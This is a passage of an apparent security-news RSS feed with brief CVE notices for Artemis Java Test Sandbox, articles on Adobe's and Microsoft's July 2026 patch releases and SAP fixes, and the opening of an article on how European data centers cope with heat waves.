This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2024-23680">CVE-2024-23680</a>. Access to the local network is required for this attack to succeed. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-23682 | Artemis Java Test Sandbox versions up to 1.7.x trust boundary violation (ID 15 / EUVD-2024-0368)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Artemis Java Test Sandbox versions up to 1.7.x. This affects an unknown part. The manipulation results in trust boundary violation.

This vulnerability is identified as CVE-2024-23682. The attack can only be performed from the loca...]]></description>
<link>https://tsecurity.de/de/3670042/sicherheitsluecken/cve-2024-23682-artemis-java-test-sandbox-versions-up-to-17x-trust-boundary-violation-id-15-euvd-2024-0368/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670042/sicherheitsluecken/cve-2024-23682-artemis-java-test-sandbox-versions-up-to-17x-trust-boundary-violation-id-15-euvd-2024-0368/</guid>
<pubDate>Wed, 15 Jul 2026 10:39:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/artemis:java_test_sandbox_versions">Artemis Java Test Sandbox versions up to 1.7.x</a>. This affects an unknown part. The manipulation results in trust boundary violation.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2024-23682">CVE-2024-23682</a>. The attack can only be performed from the local network. There is not any exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-23681 | Artemis Java Test Sandbox up to 1.11.1 sandbox (GHSA-98hq-4wmw-98w9 / EUVD-2024-0326)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Artemis Java Test Sandbox up to 1.11.1. This impacts an unknown function. The manipulation leads to sandbox issue.

This vulnerability is referenced as CVE-2024-23681. The attack needs to be initiated within the local network. No exploit...]]></description>
<link>https://tsecurity.de/de/3670040/sicherheitsluecken/cve-2024-23681-artemis-java-test-sandbox-up-to-1111-sandbox-ghsa-98hq-4wmw-98w9-euvd-2024-0326/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670040/sicherheitsluecken/cve-2024-23681-artemis-java-test-sandbox-up-to-1111-sandbox-ghsa-98hq-4wmw-98w9-euvd-2024-0326/</guid>
<pubDate>Wed, 15 Jul 2026 10:38:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/artemis:java_test_sandbox">Artemis Java Test Sandbox up to 1.11.1</a>. This impacts an unknown function. The manipulation leads to sandbox issue.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2024-23681">CVE-2024-23681</a>. The attack needs to be initiated within the local network. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe schließt über 80 Sicherheitslücken in Cold Fusion, Premiere & Co]]></title>
<description><![CDATA[Adobe folgt beim Patch Day im Juli nicht Microsofts Beispiel, stellt keine neuen Update-Rekorde auf. In 12 Security Bulletins dokumentiert der Hersteller 89 beseitigte Sicherheitslücken. Betroffen sind After Effects, Animate, Audition, Bridge, ColdFusion, Commerce & Magento, Content Credentials S...]]></description>
<link>https://tsecurity.de/de/3669952/it-nachrichten/adobe-schliesst-ueber-80-sicherheitsluecken-in-cold-fusion-premiere-co/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669952/it-nachrichten/adobe-schliesst-ueber-80-sicherheitsluecken-in-cold-fusion-premiere-co/</guid>
<pubDate>Wed, 15 Jul 2026 10:03:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Adobe folgt beim Patch Day im Juli nicht Microsofts Beispiel, stellt keine neuen Update-Rekorde auf. In 12 Security Bulletins dokumentiert der Hersteller 89 beseitigte Sicherheitslücken. Betroffen sind After Effects, Animate, Audition, Bridge, ColdFusion, Commerce &amp; Magento, Content Credentials SDK, Creative Cloud Desktop App, Experience Manager (AEM), Illustrator, Media Encoder und Premiere. Mehr als zwei Drittel der Schwachstellen (63) sind als kritisch eingestuft.</p>



<p>Angriffe, bei denen eine der im Folgenden aufgeführten Sicherheitslücken ausgenutzt würde, sind bislang nicht bekannt. Adobe weist daher für die meisten Updates die niedrigste Dringlichkeitsstufe 3 aus. Nur bei ColdFusion weist Adobe die höchste Prioritätsstufe 1 aus. Bei Commerce &amp; Magento gilt die mittlere Prioritätsstufe 2. Die Angaben gelten, soweit nicht anders angegeben, stets für Windows und macOS oder schlicht für alle Plattformen. Adobe hat inzwischen auf zwei Update-Termine pro Monat umgestellt, am zweiten und vierten Dienstag des Monats.</p>



<p><a href="https://www.pcwelt.de/article/3191057/microsofts-monster-patch-day-sprengt-alle-rekorde.html" data-type="link" data-id="https://www.pcwelt.de/article/3191057/microsofts-monster-patch-day-sprengt-alle-rekorde.html" target="_blank" rel="noreferrer noopener">▶Microsofts Monster-Patch Day sprengt alle Rekorde</a></p>



<p>In ColdFusion musste Adobe 13 Schwachstellen beheben, von denen 12 als kritisch eingestuft sind. Adobe rät zudem aus Sicherheitsgründen dringend dazu, den neuesten MySQL Java-Connector zu verwenden. Außerdem verweist der Hersteller zum wiederholten Mal auf seine Filterdokumentation zum Schutz vor Deserialisierungsangriffen.</p>



<p>Adobes Online-Shop-Lösung Commerce, basierend auf der quelloffenen Magento-Software, erhält in ihren diversen Varianten Updates gegen 14 Schwachstellen. Acht dieser Lücken stuft Adobe als kritisch ein. Die gefährlichste Lücke ist offenbar CVE-2026-48356 mit dem CVSS-Score 9.6. Ein Angreifer könnte ohne Benutzeranmeldung Dateien mit potenziell gefährlichen Inhalten, namentlich schädlichem Code hochladen. Diese Dateien könnten automatisch ausgeführt werden.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Adobe Experience Manager (AEM) kommt auf 13 geschlossene Sicherheitslücken, von denen vier als kritisch eingestuft sind. Bei den neun als hohes Risiko ausgewiesenen Schwachstellen handelt es sich um XSS-Lücken (cross-site scripting). Ein Teil der Lücken betrifft nur den AEM Cloud Service.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihre Programme stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<p>In der Videoschnitt-Software Premiere und Premiere Pro hat Adobe vier Lücken gestopft, drei davon sind als kritisch eingestufte RCE-Lücken (remote code execution). Im Media Encoder sind fünf Schwachstellen beseitigt, vier davon RCE-Lücken. In After Effects haben die Entwickler drei als kritisch eingestufte RCE-Lücken geschlossen. Das Zeichenprogramm Illustrator bekommt Updates gegen fünf als kritisch ausgewiesene Sicherheitslücken, darunter vier RCE-Lücken.</p>



<p>Die neuesten <a href="https://helpx.adobe.com/security/Home.html" target="_blank" rel="noreferrer noopener">Adobe Security Bulletins</a> finden Sie auf der Website des Herstellers.</p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><thead><tr><th>Produkt</th><th>anfällige Version(en)</th><th>abge­sicherte Version(en)</th><th>Schwach­stellen</th><th>Risiko</th><th>Priorität</th></tr></thead><tbody><tr><td>After Effects</td><td>26.2.1 und älter</td><td>26.3</td><td>3</td><td>kritisch</td><td>3</td></tr><tr><td></td><td>25.6.5 und älter</td><td>25.6.6</td><td></td><td></td><td></td></tr><tr><td>Animate 2024</td><td>24.0.13 und älter</td><td>24.0.14</td><td>6</td><td>kritisch</td><td>3</td></tr><tr><td>Animate 2023</td><td>23.0.15 und älter</td><td>23.0.16</td><td></td><td></td><td></td></tr><tr><td>Audition</td><td>26.0 und älter</td><td>26.3</td><td>6</td><td>kritisch</td><td>3</td></tr><tr><td></td><td>25.6.4 und älter</td><td>25.6.6</td><td></td><td></td><td></td></tr><tr><td>Bridge</td><td>16.0.3 und älter</td><td>16.0.4</td><td>6</td><td>kritisch</td><td>3</td></tr><tr><td></td><td>15.1.5 (LTS) und älter</td><td>15.1.6 (LTS)</td><td></td><td></td><td></td></tr><tr><td>Cold Fusion 2025</td><td>Update 10 und älter</td><td>Update 11</td><td>13</td><td>kritisch</td><td>1</td></tr><tr><td>Cold Fusion 2023</td><td>Update 21 und älter</td><td>Update 22</td><td></td><td></td><td></td></tr><tr><td>Commerce &amp; Magento Open Source</td><td>2.4.9</td><td>2.4.9-2026-jul</td><td>14</td><td>kritisch</td><td>2</td></tr><tr><td></td><td>2.4.8-p5 und älter</td><td>2.4.8-2026-jul</td><td></td><td></td><td></td></tr><tr><td></td><td>2.4.7-p10 und älter</td><td>2.4.7-2026-jul</td><td></td><td></td><td></td></tr><tr><td></td><td>2.4.6-p15 und älter</td><td>2.4.6-2026-jul</td><td></td><td></td><td></td></tr><tr><td></td><td>2.4.5-p17 und älter</td><td>2.4.5-2026-jul</td><td></td><td></td><td></td></tr><tr><td></td><td>2.4.4-p18 und älter</td><td>2.4.4-2026-jul</td><td></td><td></td><td></td></tr><tr><td>Content Credentials JS SDK</td><td>@contentauth/c2pa-web@0.7.0 und älter</td><td>@contentauth/c2pa-web@0.9.0</td><td>12</td><td>kritisch</td><td>3</td></tr><tr><td>Content Credentials Rust SDK</td><td>c2pa-v0.84.0 und älter</td><td>c2pa-v0.85.2</td><td></td><td></td><td></td></tr><tr><td>Content Cred. Command-Line Tool</td><td>c2pa-v0.17.0 und älter</td><td>c2patool-v0.26.65</td><td></td><td></td><td></td></tr><tr><td>Creative Cloud Desktop App</td><td>6.9.1.1 und älter (Win)</td><td>6.10.0.252.3 (Win)</td><td>2</td><td>kritisch</td><td>3</td></tr><tr><td>Experience Manager (AEM)</td><td>6.5 SP24 und älter</td><td>6.5 SP25 Hotfix f. NPR-43971</td><td>8</td><td>kritisch</td><td>3</td></tr><tr><td></td><td>6.5 LTS SP1 und älter</td><td>6.5 LTS SP2 Hotfix f. NPR-43972</td><td></td><td></td><td></td></tr><tr><td>AEM Cloud Service</td><td>Release 2026.5.0 und älter</td><td>Release 2026.06</td><td>13</td><td>kritisch</td><td>3</td></tr><tr><td>Illustrator 2026</td><td>30.5 und älter</td><td>30.6</td><td>5</td><td>kritisch</td><td>3</td></tr><tr><td>Illustrator 2025</td><td>29.8.7 und älter</td><td>29.8.9</td><td></td><td></td><td></td></tr><tr><td>Media Encoder</td><td>26.2.2 und älter</td><td>26.3</td><td>5</td><td>kritisch</td><td>3</td></tr><tr><td></td><td>25.6.5 und älter</td><td>25.6.6</td><td></td><td></td><td>,</td></tr><tr><td>Premiere</td><td>26.2.2 und älter</td><td>26.3</td><td>4</td><td>kritisch</td><td>3</td></tr><tr><td>Premiere Pro</td><td>25.6.5 und älter</td><td>25.6.6</td><td></td><td></td><td></td></tr></tbody></table></figure>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Patch Tuesday roundup: Microsoft fixes a monthly record 569 holes; SAP patches a critical memory corruption bug]]></title>
<description><![CDATA[Earlier this month Microsoft warned that, because the latest AI models can now help discover vulnerabilities, CSOs will see a higher volume of security updates every month. It wasn’t kidding.



Today the company issued a record number of patches, with 59 rated as critical. And Microsoft is now r...]]></description>
<link>https://tsecurity.de/de/3669391/it-security-nachrichten/patch-tuesday-roundup-microsoft-fixes-a-monthly-record-569-holes-sap-patches-a-critical-memory-corruption-bug/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669391/it-security-nachrichten/patch-tuesday-roundup-microsoft-fixes-a-monthly-record-569-holes-sap-patches-a-critical-memory-corruption-bug/</guid>
<pubDate>Wed, 15 Jul 2026 04:07:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Earlier this month Microsoft warned that, because the latest AI models can now help discover vulnerabilities, CSOs will see a higher volume of security updates every month. It wasn’t kidding.</p>



<p class="wp-block-paragraph">Today the company <a href="https://msrc.microsoft.com/update-guide/">issued a record number of patches</a>, with 59 rated as critical. And Microsoft is now recommending that customers accelerate their patching schedules to more quickly deal with critical flaws.</p>



<p class="wp-block-paragraph">“Normally we have to wait for October or November to determine if we’ll break the previous [annual] patch volume record,” which was 1,245 vulnerabilities found in 2020, commented <a href="https://www.tenable.com/profile/satnam-narang">Satnam Narang</a>, senior staff research engineer at Tenable. But not this year. Tenable counted 569 CVEs that were patched officially as part of this month’s Patch Tuesday, excluding the server-side updates not requiring user intervention, smashing last month’s record of 198 fixes</p>



<p class="wp-block-paragraph">It’s probable, he said, that by the end of this year, Microsoft will have found over 3,000 common vulnerabilities and exposures (CVEs).</p>



<p class="wp-block-paragraph">Today’s volume of holes is “striking,” he added, “but it reflects how good these tools have become at finding bugs, not how many of those bugs actually pose a risk to organizations.” </p>



<p class="wp-block-paragraph">Separately, SAP released 20<strong> </strong>new and updated security patches, including a critical memory corruption vulnerability in NetWeaver Application Server ABAP, SAP Kernel, and frontend services tied to SAP GUI for HTML, which has a CVSS score of 9.9.</p>



<h2 class="wp-block-heading">Microsoft patches</h2>



<p class="wp-block-paragraph">Among the huge number of CVEs that Microsoft found were three zero-days that need to be patched, including two that have been exploited in the wild. </p>



<p class="wp-block-paragraph">Those two are both elevation of privilege vulnerabilities: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56155">CVE-2026-56155,</a> an Active Directory Federation Services (AD FS) flaw that allows attackers with limited access to elevate privileges to administrator, and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>, a Microsoft SharePoint Server vulnerability. </p>



<p class="wp-block-paragraph">The third is <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>, a security feature bypass in Windows BitLocker, which was noted as having been publicly disclosed. “We surmise that this could be related to a flurry of zero-day vulnerabilities disclosed by the researcher known as Nightmare Eclipse or Chaotic Eclipse,” Narang said, “though no official confirmation was made. We also know that the researcher promised to drop something on Patch Tuesday.”</p>



<p class="wp-block-paragraph">While these were the most noteworthy flaws this month, Narang said, for CSOs the July patches prove that the state of the Exploitability Index, which rates how likely a vulnerability is to be exploited, must shift, given the machine speed of exploit discovery. For example, he pointed out, in May, Microsoft originally tagged <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45659">CVE-2026-45659</a>, a SharePoint vulnerability, as exploitation less likely. However, the vulnerability was added to the US Cybersecurity &amp; Infrastructure Security Agency’s list of known exploited vulnerabilities on July 1.</p>



<p class="wp-block-paragraph">He added that Anthropic’s Red Team’s own findings for known vulnerabilities (n-days) revealed how fragile the monthly Patch Tuesday system has become, with its Mythos Preview model being able to produce proof-of-concept exploits for 13 of 14 vulnerabilities that were rated as Exploitation Less Likely or Exploitation Unlikely.</p>



<p class="wp-block-paragraph">“What this means is that our way of looking at Patch Tuesday has changed, because the exploitability index is centered around humans, not AI tools, and as these tools continue to improve, defense needs to improve alongside it,” Narang said.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/dustincchilds/">Dustin Childs</a>, head of threat awareness at TrendAI’s Zero Day Initiative, agreed.</p>



<p class="wp-block-paragraph">“To call this record-breaking is a massive understatement,” said Childs. “This is the ‘Mother of All Releases’. The bug apocalypse has fully descended upon us, with July’s numbers pushing the year-to-date CVE count past every single full-year total of the last 20 years. Security teams need to take an extended break from their regularly scheduled activities to eat this elephant one byte at a time, starting immediately with active exploits in Active Director FS and SharePoint.”</p>



<p class="wp-block-paragraph">He particularly drew attention to a near-perfect 9.9 CVSS flaw in Windows VMSwitch (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57092">CVE-2026-57092</a>) that allows low-privileged attackers to escape virtual machine boundaries for full host compromise.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/bicer/">Jack Bicer</a>, director of vulnerability research at Action1, agreed that IT leadership should prioritize immediate remediation of the actively exploited Active Directory Federation Services elevation of privilege vulnerability and the SharePoint Server elevation of privilege vulnerability .</p>



<p class="wp-block-paragraph">After that, he said, priority should be given to these critical vulnerabilities: Active Directory Certificate Services Elevation of Privilege Vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121">CVE-2026-54121</a>), which introduces the possibility of attackers impersonating trusted systems and potentially compromising AD through certificate abuse; a Windows Active Directory Domain Services remote code execution vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49164">CVE-2026-49164</a>) which enables unauthenticated remote code execution against one of the most critical components within Windows enterprise environments; a Microsoft Dynamics NAV and Microsoft Dynamics 365 Business Central remote code execution vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55944">CVE-2026-55944</a>); a Microsoft Exchange Server spoofing vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55008">CVE-2026-55008</a>); Microsoft SQL Server remote code execution vulnerabilities (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54118">CVE-2026-54118</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54117">CVE-2026-54117</a>); and multiple Windows DHCP Server vulnerabilities. </p>



<p class="wp-block-paragraph">These holes create opportunities for attackers to compromise financial systems, communication platforms, databases, and core network infrastructure, Bicer pointed out, systems which often provide direct access to sensitive business information and frequently serve as high-value targets for ransomware operators and advanced threat actors. </p>



<p class="wp-block-paragraph">There are also important security updates for Microsoft Defender, Bicer added, noting that vulnerabilities affecting endpoint protection software deserve immediate attention because successful exploitation undermines one of the organization’s primary defensive controls.</p>



<h2 class="wp-block-heading">IT teams must prioritize</h2>



<p class="wp-block-paragraph"><a href="https://fsi.stanford.edu/people/andrew-j-grotto">AJ Grotto</a>, a research scholar at the Centre for International Security and Co-operation and former Senior White House Director for Cyber Policy, said that Microsoft’s July Patch Tuesday “is a stark reminder that security teams are now operating in an era of vulnerability volume and velocity. With 570 vulnerabilities patched, including three actively exploited zero-days, the biggest concern for CSOs isn’t just the number of flaws, but the concentration of risk around identity systems, collaboration platforms, and privilege escalation pathways. The actively exploited vulnerabilities in Active Directory Federation Services and SharePoint are especially concerning because they target technologies that sit at the center of enterprise trust and access.”</p>



<p class="wp-block-paragraph">He added, “for CSOs, the challenge is no longer just defending against threat actors, it’s keeping up with an accelerating cycle of vulnerabilities and updates across the Microsoft ecosystem in the AI era. Security leaders should think critically about diversifying their vendors to protect their enterprise and save time and money on patching an increasing list of bugs that nearly tripled month-over-month.”</p>



<p class="wp-block-paragraph">“While the sheer number of [Microsoft] vulnerabilities might seem alarming on the surface,” said <a href="https://www.linkedin.com/in/nicholasacarroll/">Nick Carroll</a> and <a href="https://www.linkedin.com/in/rainmbaker/">Rain Baker</a> of the Nightwing ShadowScout threat intelligence team, “this can actually be seen as a positive sign for enterprise security. It means vendors are finding and fixing flaws before adversaries can weaponize them en masse.”</p>



<p class="wp-block-paragraph">And <a href="https://www.fortra.com/profile/josh-taylor">Josh Taylor</a>, lead cybersecurity analyst at Fortra, noted that 26 of the Microsoft vulnerabilities have a CVSS base score above 9.0, and 13 of those sit at 9.8. “That matters,” he said, “but CVSS is still only one part of the risk story. The real triage problem this month is the mix of exploited issues, a publicly disclosed BitLocker flaw, and a massive concentration of vulnerabilities in Windows and Office.” </p>



<p class="wp-block-paragraph">He said, “for patching teams, this is the kind of month that rewards discipline. The right move is not panic, it is sequencing: put exploited issues and exposed infrastructure first, then let the normal validation process do its job.”</p>



<h2 class="wp-block-heading">Others increasing their patch cadence too</h2>



<p class="wp-block-paragraph"><a href="https://www.ivanti.com/blog/authors/chris-goettl">Chris Goettl</a>, vice-president of product management at Ivanti, noted many software vendors in addition to Microsoft are increasing their security update cadence. For example, Cisco Systems has just shifted to a risk-based, twice-monthly disclosure model (the first and third Wednesday of each month), Mozilla is on a near weekly security update march, and Oracle’s new Critical Security Patch Update (CSPU) program has been delivering targeted critical-severity fixes on the 3rd Tuesday of non-CPU months since May.</p>



<p class="wp-block-paragraph">Nightwing also noted that Adobe issued 12 separate security bulletins for products in its first twice-monthly bulletin. Administrators must treat today’s Priority 1 ColdFusion update (APSB26-82) with urgency, as it patches a critical 9.9 CVSS path traversal vulnerability (CVE-2026-48318). It’s one of 11 ColdFusion vulnerabilities patched. </p>



<p class="wp-block-paragraph">Additionally, retail and web administrators should immediately prioritize Adobe Commerce (APSB26-73), which resolves a 9.6 CVSS flaw allowing unrestricted uploads of dangerous file types (CVE-2026-48356).</p>



<h2 class="wp-block-heading">SAP vulnerabilities</h2>



<p class="wp-block-paragraph"><a href="https://pathlock.com/author/jonathan-stross/">Jonathan Stross</a>, senior product manager for cybersecurity research and innovation at Pathlock, said the most critical of the SAP fixes is Note 3747367, a memory corruption vulnerability in NetWeaver Application Server ABAP, with a CVSS score of 9.9. The vulnerability affects the ABAP Application Server, SAP Kernel, and frontend services tied to SAP GUI for HTML.</p>



<p class="wp-block-paragraph"> According to SAP, an authenticated attacker can trigger logical memory-management errors that may lead to unauthorized data access, data modification, or system unavailability. The likely attack scenario involves a compromised account or malicious insider abusing a crafted request that reaches the vulnerable code path. </p>



<p class="wp-block-paragraph">“Because a successful exploit can impact confidentiality, integrity, and availability at the platform level, while potentially destabilizing a core ABAP system, organizations should treat this as the highest-priority patch in the July release,” Stross said. </p>



<p class="wp-block-paragraph">Prioritize the critical ABAP kernel issue, plus the AppRouter request smuggling note, and the Commerce Cloud sample-credential issue first, he said, because these are the most likely to produce direct security impact in real environments.</p>



<p class="wp-block-paragraph">But do not treat the updated notes as noise, he added. The July overview includes three re-released items that still matter operationally, and this should be reflected in patch planning and change records. The attack surface is distributed: ABAP, Java, BTP, Commerce, SAProuter, UI5, and supporting libraries all appear in the same monthly cycle, so patching needs coordinated platform ownership.</p>



<p class="wp-block-paragraph"><a href="https://onapsis.com/post-author/thomas-fritsch/">Thomas Fritsch</a>, an SAP researcher at Onapsis, described the <a href="https://onapsis.com/blog/sap-security-patch-day-july-2026/">SAP Security notes</a> in detail and noted that SAP teams who can’t immediately install the NetWeaver memory corruption fix can, as a temporary workaround, disable all ICF nodes with a specific property in transaction SICF. However, since the workaround will disable opening transactions in SAP GUI for HTML, it is not an option for all customers and it is strongly recommended to install the patched ABAP Kernel version.</p>



<h2 class="wp-block-heading">Patching should become continuous</h2>



<p class="wp-block-paragraph">“AI is likely to expose new classes of weaknesses, and will introduce some of its own through AI-assisted development,” commented <a href="https://www.linkedin.com/in/thegenemoody/">Gene Moody</a>, Field CTO at Action1. “Logically, with that in mind, the future of updating must become more continuous, more adaptive, and less tied to a fixed calendar. Discovery will not follow business logic; it will be swift and unforgiving. We must accept that, and be just as diligent in our defense, because the cost of failure is higher than the inconvenience of change.” </p>



<p class="wp-block-paragraph">He added, “in my crystal ball, I see a future where Microsoft and others move steadily away from scheduled monthly patch cycles in favor of rolling updates for most security issues in as close to live time as they can be researched and released. That would be a win for the entire industry. Faster patch creation and delivery, paired with more agile practices on the customer side, would finally start to align patching with the pace of modern discovery and exploitation.” </p>



<p class="wp-block-paragraph">“What needs to happen is simple,” he said. “Patching on a calendar is no longer a safe assumption in today’s threat landscape. Patching where and when needed versus scheduled is the only path forward.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How data centers cope with heat waves]]></title>
<description><![CDATA[Europe is sweltering. The summer of 2026 has seen historic heat waves that have taken a significant toll on infrastructure. In recent weeks, across the continent, problems have been reported in the power grid, telecommunications, and rail transportation. IT infrastructure has not been spared from...]]></description>
<link>https://tsecurity.de/de/3669125/it-security-nachrichten/how-data-centers-cope-with-heat-waves/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669125/it-security-nachrichten/how-data-centers-cope-with-heat-waves/</guid>
<pubDate>Tue, 14 Jul 2026 22:52:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Europe is sweltering. The summer of 2026 has seen historic heat waves that have taken a significant toll on infrastructure. In recent weeks, across the continent, problems have <a href="https://www.bbc.com/news/articles/cj0gez6d50ro" target="_blank" rel="noreferrer noopener">been reported</a> in the power grid, telecommunications, and rail transportation. IT infrastructure has not been spared from the situation.</p>



<p class="wp-block-paragraph">“The heat affects equipment long before anyone notices a problem,” explains Ricardo Román, sales director at Fracttal, in an email. “Every piece of equipment has a temperature range within which it is designed to operate, and when it operates above that range, it begins to degrade silently,” he says. A process of wear and tear begins that will eventually take its toll. With technology, this happens much faster. “In a data center, this effect is amplified because there’s no margin for error,” he notes. When something starts to fail, everything grinds to a halt.</p>



<p class="wp-block-paragraph">In fact, this latest heat wave has already had negative impacts on data centers outside of Spain. In the United Kingdom, high temperatures shut down hospital data centers and <a href="https://www.lavanguardia.com/neo/ia/20260707/11586247/ola-calor-deja-fuera-combate-mayores-superordenadores-ia-1-000-hervidores-agua-funcionando-vez.html" target="_blank" rel="noreferrer noopener">caused</a> the University of Cambridge’s Dawn supercomputer to go offline, as its cooling systems were unable to cope with the temperatures. That’s the crux of the problem. “In IT, heat isn’t a computing problem—it’s a problem of maintaining the assets that support the data center,” explains Román. </p>



<p class="wp-block-paragraph">Heat thus becomes yet another risk for the IT industry and, in particular, for data centers. </p>



<p class="wp-block-paragraph">Temperatures are a clear and growing concern when it comes to corporate risk prevention. “I see it in conversations with clients: In the past, the maintenance team was the one monitoring the temperature in a technical room,” Román says. “Today, management also monitors it, because they know that if that goes down, the service goes down—and behind the service is the end customer,” he adds. Maintenance has gone from being a cost “to a lever for business continuity that no one dares to touch.”</p>



<p class="wp-block-paragraph">As a World Economic Forum analysis warns, we’re experiencing a boom in AI-driven <a href="https://www.computerworld.es/article/4166490/especial-centros-de-datos-2026.html">data centers</a>, but the impact of climate risks on them is being overlooked. Their estimates <a href="https://www.weforum.org/stories/climate-action/data-centres-3-3-trillion-question-heat-cooling/">suggest</a> these risks could result in an additional annual cost of $81 billion by 2035 and $168 billion by 2065. These calculations include all kinds of threats, such as floods or droughts, but most of the impact comes from extreme heat.</p>



<p class="wp-block-paragraph">These projections are confirmed by data from the industry itself: Over the past three years, extreme weather events <a href="https://www.cnbc.com/2026/06/29/ai-data-centers-heatwave-climate-risk-weather.html" target="_blank" rel="noreferrer noopener">have accounted for</a> one-third of the losses incurred by the U.S. division of the data center company Zurich. According to projections by the climate risk analysis firm First Street, 79% of global data centers will face increased risks from extreme weather. MapleCroft estimated in 2025 that 56% of major data centers had a high or very high risk rating for extreme heat, and that <a href="https://www.cio.com/article/4041210/las-olas-de-calor-pueden-poner-en-jaque-a-los-centros-de-datos.html" target="_blank">this figure would rise to 80% by 2080</a>.</p>



<p class="wp-block-paragraph">These percentages cannot be easily extrapolated to Europe in general—and to Spain in particular—as one might think, although they do make the trend clear. Guillermo Benito, CTO of Nabiax, points out during a video call that these studies are based on global samples and thus place significant weight on the capacity of Asia and the United States. “We represent a small percentage there, but that said, all countries will have to adapt. The two major challenges for data centers are energy and cooling,” Benitonotes.</p>



<h2 class="wp-block-heading">Spain: A pioneer in heat?</h2>



<p class="wp-block-paragraph">In late June, French Labor Minister Jean-Pierre Farandou <a href="https://www.france24.com/es/minuto-a-minuto/20260630-francia-quiere-estudiar-el-modelo-espa%C3%B1ol-para-adaptar-la-sociedad-al-calor-extremo" target="_blank" rel="noreferrer noopener">proposed</a> taking a training course in Spain to learn how to prevent high temperatures from paralyzing a country. Although Spain’s climate varies by region, high summer temperatures are common in many areas (though climate change has made them more extreme and frequent in recent years), and the infrastructure of knowledge and solutions that Farandou wanted to learn about has been established. The big question is whether this also applies to data centers. Is Spain better prepared than other European regions?</p>



<p class="wp-block-paragraph">“Heat waves are becoming increasingly intense and frequent. What used to happen once every two years now happens two, three, or four times a year,” Benito says. Speaking from his own experience, he adds: “In Spain, data centers already take these factors into account.” When it comes to redundancy, monitoring, or maintenance, these factors are already factored in. “It’s not like it’s an unforeseen event. It’s already been taken into account, and we build in a lot of redundancy—a wide safety margin,” he says.</p>



<p class="wp-block-paragraph">The difference compared to central or northern Europe is that some haven’t considered this possibility. Benito points out that the same thing happens with homes. “For many years, they’ve been designing with two assumptions: that they have plenty of water because their climates are humid, and that it never gets hot,” he says. And this is a problem, because their summer temperatures have risen significantly during extreme heat waves. “Temperatures in the UK have gone up by 10 or 15 degrees, and their data centers aren’t prepared for that,” he says. In fact, he shares an anecdote about “a certain hyperscaler that, a few years ago, when its data centers in the United Kingdom went down, held a global conference to figure out how this had happened and draw lessons from it.” The curious thing is that what they learned was something that was already well known in Spain.</p>


